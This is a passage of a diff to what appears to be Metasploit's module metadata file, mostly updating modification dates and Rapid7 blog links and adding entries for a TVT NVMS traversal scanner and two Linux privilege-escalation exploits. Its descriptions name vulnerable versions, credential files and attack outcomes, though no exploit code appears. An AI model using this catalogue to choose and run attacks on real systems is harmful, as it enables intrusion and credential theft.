     "platform": "",
     "arch": "",
@@ -27747,7 +27482,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/novell_file_reporter_fsfui_fileaccess",
@@ -27773,7 +27508,7 @@
     "description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve\n        arbitrary files via a request to /FSF/CMD with a SRS Record with OPERATION 4 and\n        CMD 103, specifying a full pathname. This module has been tested successfully\n        against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File\n        Reporter 1.0.1).",
     "references": [
       "CVE-2012-4957",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
+      "URL-https://blog.rapid7.com/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
     ],
     "platform": "",
     "arch": "",
@@ -27795,7 +27530,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2019-03-05 03:38:51 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/novell_file_reporter_srs_fileaccess",
@@ -28702,7 +28437,7 @@
     "description": "This module attempts to identify Ruby on Rails instances vulnerable to\n        an arbitrary object instantiation flaw in the XML request processor.",
     "references": [
       "CVE-2013-0156",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156"
+      "URL-https://blog.rapid7.com/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156"
     ],
     "platform": "",
     "arch": "",
@@ -28723,7 +28458,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/rails_xml_yaml_scanner",
@@ -29548,7 +29283,7 @@
     "references": [
       "CVE-2013-3621",
       "CVE-2013-3623",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
+      "URL-https://blog.rapid7.com/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
     ],
     "platform": "",
     "arch": "",
@@ -29569,7 +29304,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/smt_ipmi_cgi_scanner",
@@ -29596,7 +29331,7 @@
     "description": "This module checks for a static SSL certificate shipped with Supermicro Onboard IPMI\n        controllers. An attacker with access to the publicly-available firmware can perform\n        man-in-the-middle attacks and offline decryption of communication to the controller.\n        This module has been on a Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware\n        version SMT_X9_214.",
     "references": [
       "CVE-2013-3619",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
+      "URL-https://blog.rapid7.com/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
     ],
     "platform": "",
     "arch": "",
@@ -29608,7 +29343,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/smt_ipmi_static_cert_scanner",
@@ -29634,7 +29369,7 @@
     ],
     "description": "This module abuses a directory traversal vulnerability in the url_redirect.cgi application\n        accessible through the web interface of Supermicro Onboard IPMI controllers.  The vulnerability\n        is present due to a lack of sanitization of the url_name parameter. This allows an attacker with\n        a valid, but not necessarily administrator-level account, to access the contents of any file\n        on the system. This includes the /nv/PSBlock file, which contains the cleartext credentials for\n        all configured accounts. This module has been tested on a Supermicro Onboard IPMI (X9SCL/X9SCM)\n        with firmware version SMT_X9_214. Other file names to try include /PSStore, /PMConfig.dat, and\n        /wsman/simple_auth.passwd",
     "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities",
+      "URL-https://blog.rapid7.com/2013/11/06/supermicro-ipmi-firmware-vulnerabilities",
       "URL-https://github.com/zenfish/ipmi/blob/master/dump_SM.py"
     ],
     "platform": "",
@@ -29656,7 +29391,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/smt_ipmi_url_redirect_traversal",
@@ -30873,6 +30608,54 @@
     },
     "needs_cleanup": false
   },
+  "auxiliary_scanner/http/tvt_nvms_traversal": {
+    "name": "TVT NVMS-1000 Directory Traversal",
+    "fullname": "auxiliary/scanner/http/tvt_nvms_traversal",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-12-12",
+    "type": "auxiliary",
+    "author": [
+      "Numan Türle",
+      "Dhiraj Mishra"
+    ],
+    "description": "This module exploits an unauthenticated directory traversal vulnerability which\n        exists in TVT network surveillance management software-1000 version 3.4.1.\n        NVMS listens by default on port 80.",
+    "references": [
+      "CVE-2019-20085",
+      "EDB-47774"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-01-21 08:43:19 +0000",
+    "path": "/modules/auxiliary/scanner/http/tvt_nvms_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/tvt_nvms_traversal",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
   "auxiliary_scanner/http/typo3_bruteforce": {
     "name": "Typo3 Login Bruteforcer",
     "fullname": "auxiliary/scanner/http/typo3_bruteforce",
@@ -32379,7 +32162,7 @@
     "description": "This module exploits a hardcoded user and password for the GetFile maintenance\n        task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web\n        Console and can be triggered by sending a specially crafted request to the rtrlet component,\n        allowing a remote unauthenticated user to retrieve a maximum of 100_000_000 KB of\n        remote files. This module has been successfully tested on Novell ZENworks Asset\n        Management 7.5.",
     "references": [
       "CVE-2012-4933",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks"
+      "URL-https://blog.rapid7.com/2012/10/11/cve-2012-4933-novell-zenworks"
     ],
     "platform": "",
     "arch": "",
@@ -32400,7 +32183,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/zenworks_assetmanagement_fileaccess",
@@ -32426,7 +32209,7 @@
     "description": "This module exploits a hardcoded user and password for the GetConfig maintenance\n        task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web\n        Console and can be triggered by sending a specially crafted request to the rtrlet component,\n        allowing a remote unauthenticated user to retrieve the configuration parameters of\n        Novell Zenworks Asset Managment, including the database credentials in clear text.\n        This module has been successfully tested on Novell ZENworks Asset Management 7.5.",
     "references": [
       "CVE-2012-4933",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks"
+      "URL-https://blog.rapid7.com/2012/10/11/cve-2012-4933-novell-zenworks"
     ],
     "platform": "",
     "arch": "",
@@ -32447,7 +32230,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/zenworks_assetmanagement_getconfig",
@@ -33748,7 +33531,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-16 14:21:09 +0000",
     "path": "/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/sunrpc_portmapper",
@@ -34204,7 +33987,7 @@
       "sybase"
     ],
     "targets": null,
-    "mod_time": "2019-06-27 17:06:32 +0000",
+    "mod_time": "2020-02-08 15:31:27 +0000",
     "path": "/modules/auxiliary/scanner/mssql/mssql_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/mssql/mssql_login",
@@ -34322,7 +34105,7 @@
     "references": [
       "CVE-2012-2122",
       "OSVDB-82804",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql"
+      "URL-https://blog.rapid7.com/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql"
     ],
     "platform": "",
     "arch": "",
@@ -34334,7 +34117,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb",
     "is_install_path": true,
     "ref_name": "scanner/mysql/mysql_authbypass_hashdump",
@@ -34446,7 +34229,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-06-27 17:06:32 +0000",
+    "mod_time": "2020-02-08 15:31:27 +0000",
     "path": "/modules/auxiliary/scanner/mysql/mysql_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/mysql/mysql_login",
@@ -40690,7 +40473,7 @@
     "description": "This module will extract WEP keys and WPA preshared keys from\n        Arris DG950A cable modems.",
     "references": [
       "CVE-2014-4863",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/08/21/more-snmp-information-leaks-cve-2014-4862-and-cve-2014-4863"
+      "URL-https://blog.rapid7.com/2014/08/21/more-snmp-information-leaks-cve-2014-4862-and-cve-2014-4863"
     ],
     "platform": "",
     "arch": "",
@@ -40702,7 +40485,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-07-09 12:56:00 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/snmp/arris_dg950.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/arris_dg950",
@@ -40727,7 +40510,7 @@
     ],
     "description": "This module extracts password hashes from certain Brocade load\n        balancer devices.",
     "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
+      "URL-https://blog.rapid7.com/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
     ],
     "platform": "",
     "arch": "",
@@ -40739,7 +40522,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/snmp/brocade_enumhash.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/brocade_enumhash",
@@ -40917,7 +40700,7 @@
     ],
     "description": "This module extracts WEP keys and WPA preshared keys from\n        certain Netopia cable modems.",
     "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
+      "URL-https://blog.rapid7.com/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
     ],
     "platform": "",
     "arch": "",
@@ -40929,7 +40712,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/snmp/netopia_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/netopia_enum",
@@ -41223,7 +41006,7 @@
     ],
     "description": "This module will extract WEP keys and WPA preshared keys from\n        certain Ubee cable modems.",
     "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
+      "URL-https://blog.rapid7.com/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
     ],
     "platform": "",
     "arch": "",
@@ -41235,7 +41018,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/ubee_ddw3611",
@@ -41495,7 +41278,7 @@
     "description": "This module scans for the Juniper SSH backdoor (also valid on Telnet).\n        Any username is required, and the password is <<< %s(un='%s') = %u.",
     "references": [
       "CVE-2015-7755",
-      "URL-https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor",
+      "URL-https://blog.rapid7.com/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor",
       "URL-https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713"
     ],
     "platform": "",
@@ -41508,7 +41291,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-08-15 06:48:35 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/ssh/juniper_backdoor.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/juniper_backdoor",
@@ -42237,7 +42020,7 @@
       "BID-51182",
       "CVE-2011-4862",
       "EDB-18280",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2011/12/28/more-fun-with-bsd-derived-telnet-daemons"
+      "URL-https://blog.rapid7.com/2011/12/28/more-fun-with-bsd-derived-telnet-daemons"
     ],
     "platform": "",
     "arch": "",
@@ -42249,7 +42032,7 @@
       "telnet"
     ],
     "targets": null,
-    "mod_time": "2018-02-14 09:19:28 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb",
     "is_install_path": true,
     "ref_name": "scanner/telnet/telnet_encrypt_overflow",
@@ -44046,7 +43829,7 @@
     ],
     "description": "This module will automatically serve browser exploits. Here are the options you can\n        configure:\n\n        The INCLUDE_PATTERN option allows you to specify the kind of exploits to be loaded. For example,\n        if you wish to load just Adobe Flash exploits, then you can set Include to 'adobe_flash'.\n\n        The EXCLUDE_PATTERN option will ignore exploits. For example, if you don't want any Adobe Flash\n        exploits, you can set this. Also note that the Exclude option will always be evaluated\n        after the Include option.\n\n        The MaxExploitCount option specifies the max number of exploits to load by Browser Autopwn.\n        By default, 20 will be loaded. But note that the client will probably not be vulnerable\n        to all 20 of them, so only some will actually be served to the client.\n\n        The HTMLContent option allows you to provide a basic webpage. This is what the user behind\n        the vulnerable browser will see. You can simply set a string, or you can do the file://\n        syntax to load an HTML file. Note this option might break exploits so try to keep it\n        as simple as possible.\n\n        The MaxSessionCount option is used to limit how many sessions Browser Autopwn is allowed to\n        get. The default -1 means unlimited. Combining this with other options such as RealList\n        and Custom404, you can get information about which visitors (IPs) clicked on your malicious\n        link, what exploits they might be vulnerable to, redirect them to your own internal\n        training website without actually attacking them.\n\n        For more information about Browser Autopwn, please see the referenced blog post.",
     "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2015/07/16/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter--part-2"
+      "URL-https://blog.rapid7.com/2015/07/16/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter--part-2"
     ],
     "platform": "",
     "arch": "",
@@ -44058,7 +43841,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/server/browser_autopwn2.rb",
     "is_install_path": true,
     "ref_name": "server/browser_autopwn2",
@@ -45560,7 +45343,7 @@
     "references": [
       "CVE-2014-4877",
       "URL-https://bugzilla.redhat.com/show_bug.cgi?id=1139181",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/10/28/r7-2014-15-gnu-wget-ftp-symlink-arbitrary-filesystem-access"
+      "URL-https://blog.rapid7.com/2014/10/28/r7-2014-15-gnu-wget-ftp-symlink-arbitrary-filesystem-access"
     ],
     "platform": "",
     "arch": "",
@@ -45572,7 +45355,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/server/wget_symlink_file_write.rb",
     "is_install_path": true,
     "ref_name": "server/wget_symlink_file_write",
@@ -47208,7 +46991,7 @@
     ],
     "description": "This module emulates a webserver leaking PII data",
     "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2011/06/02/vsploit--virtualizing-exploitation-attributes-with-metasploit-framework"
+      "URL-https://blog.rapid7.com/2011/06/02/vsploit--virtualizing-exploitation-attributes-with-metasploit-framework"
     ],
     "platform": "",
     "arch": "",
@@ -47220,7 +47003,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/vsploit/pii/web_pii.rb",
     "is_install_path": true,
     "ref_name": "vsploit/pii/web_pii",
@@ -49866,7 +49649,7 @@
       "Cliff Stoll",
       "wvu <wvu@metasploit.com>"
     ],
-    "description": "This module exploits a stack buffer overflow in fingerd on 4.3BSD.\n        This vulnerability was exploited by the Morris worm in 1988-11-02.\n        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.",
+    "description": "This module exploits a stack buffer overflow in fingerd on 4.3BSD.\n\n        This vulnerability was exploited by the Morris worm in 1988-11-02.\n        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.\n\n        Currently, only bsd/vax/shell_reverse_tcp is supported.",
     "references": [
       "URL-https://en.wikipedia.org/wiki/Morris_worm",
       "URL-https://spaf.cerias.purdue.edu/tech-reps/823.pdf",
@@ -49886,7 +49669,7 @@
     "targets": [
       "@(#)fingerd.c   5.1 (Berkeley) 6/6/85"
     ],
-    "mod_time": "2019-12-23 19:02:13 +0000",
+    "mod_time": "2020-02-05 17:21:47 +0000",
     "path": "/modules/exploits/bsd/finger/morris_fingerd_bof.rb",
     "is_install_path": true,
     "ref_name": "bsd/finger/morris_fingerd_bof",
@@ -50875,7 +50658,7 @@
       "CWE-94",
       "OSVDB-112004",
       "EDB-34765",
-      "URL-https://community.rapid7.com/community/infosec/blog/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities",
+      "URL-https://blog.rapid7.com/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities",
       "URL-https://access.redhat.com/articles/1200223",
       "URL-https://seclists.org/oss-sec/2014/q3/649"
     ],
@@ -50900,7 +50683,7 @@
     "targets": [
       "Automatic Targeting"
     ],
-    "mod_time": "2018-09-17 22:29:20 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb",
     "is_install_path": true,
     "ref_name": "linux/http/advantech_switch_bash_env_exec",
@@ -55454,7 +55237,7 @@
       "CVE-2013-0136",
       "OSVDB-93444",
       "US-CERT-VU-701572",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities"
+      "URL-https://blog.rapid7.com/2013/05/15/new-1day-exploits-mutiny-vulnerabilities"
     ],
     "platform": "Linux",
     "arch": "x86",
@@ -55477,7 +55260,7 @@
     "targets": [
       "Mutiny 5.0-1.07 Appliance (Linux)"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/linux/http/mutiny_frontend_upload.rb",
     "is_install_path": true,
     "ref_name": "linux/http/mutiny_frontend_upload",
@@ -57411,7 +57194,7 @@
     "description": "This module exploits a buffer overflow on the Supermicro Onboard IPMI controller web\n        interface. The vulnerability exists on the close_window.cgi CGI application, and is due\n        to the insecure usage of strcpy. In order to get a session, the module will execute\n        system() from libc with an arbitrary CMD payload sent on the User-Agent header. This\n        module has been tested successfully on Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware\n        SMT_X9_214.",
     "references": [
       "CVE-2013-3623",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
+      "URL-https://blog.rapid7.com/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
     ],
     "platform": "Unix",
     "arch": "cmd",
@@ -57434,7 +57217,7 @@
     "targets": [
       "Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware SMT_X9_214"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb",
     "is_install_path": true,
     "ref_name": "linux/http/smt_ipmi_close_window_bof",
@@ -58945,7 +58728,7 @@
       "Automatic (Unix In-Memory)",
       "Automatic (Linux Dropper)"
     ],
-    "mod_time": "2020-01-14 00:50:04 +0000",
+    "mod_time": "2020-01-16 14:46:00 +0000",
     "path": "/modules/exploits/linux/http/webmin_backdoor.rb",
     "is_install_path": true,
     "ref_name": "linux/http/webmin_backdoor",
@@ -59541,7 +59324,7 @@
     "targets": [
       "Auto"
     ],
-    "mod_time": "2019-08-02 09:48:53 +0000",
+    "mod_time": "2020-01-16 15:04:57 +0000",
     "path": "/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb",
     "is_install_path": true,
     "ref_name": "linux/local/abrt_raceabrt_priv_esc",
@@ -59611,7 +59394,7 @@
       "rebel",
       "bcoles <bcoles@gmail.com>"
     ],
-    "description": "This module exploits a race condition and use-after-free in the\n        packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in\n        the Linux kernel to execute code as root (CVE-2016-8655).\n\n        The bug was initially introduced in 2011 and patched in 2016 in version\n        4.4.0-53.74, potentially affecting a large number of kernels; however\n        this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels\n        4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as\n        Linux Mint.\n\n        The target system must have unprivileged user namespaces enabled,\n        two or more CPU cores, and SMAP must be disabled.\n\n        Bypasses for SMEP and KASLR are included. Failed exploitation\n        may crash the kernel.\n\n        This module has been tested successfully on Linux Mint 17.3 (x86_64);\n        Linux Mint 18 (x86_64); and Ubuntu 16.04.2 (x86_64) with kernel\n        versions 4.4.0-45-generic and 4.4.0-51-generic.",
+    "description": "This module exploits a race condition and use-after-free in the\n        packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in\n        the Linux kernel to execute code as root (CVE-2016-8655).\n\n        The bug was initially introduced in 2011 and patched in 2016 in version\n        4.4.0-53.74, potentially affecting a large number of kernels; however\n        this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels\n        4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as\n        Linux Mint.\n\n        The target system must have unprivileged user namespaces enabled,\n        two or more CPU cores, and SMAP must be disabled.\n\n        Bypasses for SMEP and KASLR are included. Failed exploitation\n        may crash the kernel.\n\n        This module has been tested successfully on\n\n        Linux Mint 17.3 (x86_64);\n        Linux Mint 18 (x86_64);\n        Ubuntu 16.04 (x86_64); and\n        Ubuntu 16.04.2 (x86_64).",
     "references": [
       "EDB-40871",
       "CVE-2016-8655",
@@ -59636,7 +59419,7 @@
     "targets": [
       "Auto"
     ],
-    "mod_time": "2019-11-03 00:33:24 +0000",
+    "mod_time": "2020-01-19 11:51:01 +0000",
     "path": "/modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb",
     "is_install_path": true,
     "ref_name": "linux/local/af_packet_chocobo_root_priv_esc",
@@ -59789,7 +59572,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2019-04-26 13:11:40 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/linux/local/apt_package_manager_persistence.rb",
     "is_install_path": true,
     "ref_name": "linux/local/apt_package_manager_persistence",
@@ -59881,7 +59664,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2018-08-20 17:51:41 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/linux/local/autostart_persistence.rb",
     "is_install_path": true,
     "ref_name": "linux/local/autostart_persistence",
@@ -59920,7 +59703,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2019-12-14 21:40:18 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/linux/local/bash_profile_persistence.rb",
     "is_install_path": true,
     "ref_name": "linux/local/bash_profile_persistence",
@@ -60220,6 +60003,52 @@
     },
     "needs_cleanup": null
   },
+  "exploit_linux/local/diamorphine_rootkit_signal_priv_esc": {
+    "name": "Diamorphine Rootkit Signal Privilege Escalation",
+    "fullname": "exploit/linux/local/diamorphine_rootkit_signal_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2013-11-07",
+    "type": "exploit",
+    "author": [
+      "m0nad",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module uses Diamorphine rootkit's privesc feature using signal\n        64 to elevate the privileges of arbitrary processes to UID 0 (root).\n\n        This module has been tested successfully with Diamorphine from `master`\n        branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).",
+    "references": [
+      "URL-https://github.com/m0nad/Diamorphine"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2020-02-16 14:53:16 +0000",
+    "path": "/modules/exploits/linux/local/diamorphine_rootkit_signal_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/diamorphine_rootkit_signal_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": true
+  },
   "exploit_linux/local/docker_daemon_privilege_escalation": {
     "name": "Docker Daemon Privilege Escalation",
     "fullname": "exploit/linux/local/docker_daemon_privilege_escalation",
@@ -60292,7 +60121,7 @@
     "targets": [
       "Exim 4.87 - 4.91"
     ],
-    "mod_time": "2019-07-18 10:45:44 +0000",
+    "mod_time": "2020-02-05 19:13:19 +0000",
     "path": "/modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb",
     "is_install_path": true,
     "ref_name": "linux/local/exim4_deliver_message_priv_esc",
@@ -60710,7 +60539,7 @@
     "targets": [
       "Auto"
     ],
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2020-01-16 15:04:57 +0000",
     "path": "/modules/exploits/linux/local/libuser_roothelper_priv_esc.rb",
     "is_install_path": true,
     "ref_name": "linux/local/libuser_roothelper_priv_esc",
@@ -61189,7 +61018,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2018-11-04 05:28:32 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/linux/local/rc_local_persistence.rb",
     "is_install_path": true,
     "ref_name": "linux/local/rc_local_persistence",
@@ -61200,6 +61029,64 @@
     },
     "needs_cleanup": null
   },
+  "exploit_linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc": {
+    "name": "Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation",
+    "fullname": "exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 400,
+    "disclosure_date": "2018-11-01",
+    "type": "exploit",
+    "author": [
+      "Mohamed Ghannam",
+      "Jann Horn",
+      "wbowling",
+      "bcoles <bcoles@gmail.com>",
+      "nstarke"
+    ],
+    "description": "This module attempts to gain root privileges on Linux systems by abusing\n        a NULL pointer dereference in the `rds_atomic_free_op` function in the\n        Reliable Datagram Sockets (RDS) kernel module (rds.ko).\n\n        Successful exploitation requires the RDS kernel module to be loaded.\n        If the RDS module is not blacklisted (default); then it will be loaded\n        automatically.\n\n        This exploit supports 64-bit Ubuntu Linux systems, including distributions\n        based on Ubuntu, such as Linux Mint and Zorin OS.\n\n        Target offsets are available for:\n\n        Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116-generic; and\n        Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54-generic.\n\n        This exploit does not bypass SMAP. Bypasses for SMEP and KASLR are included.\n        Failed exploitation may crash the kernel.\n\n        This module has been tested successfully on various 4.4 and 4.8 kernels.",
+    "references": [
+      "CVE-2018-5333",
+      "CVE-2019-9213",
+      "BID-102510",
+      "URL-https://gist.github.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4",
+      "URL-https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c",
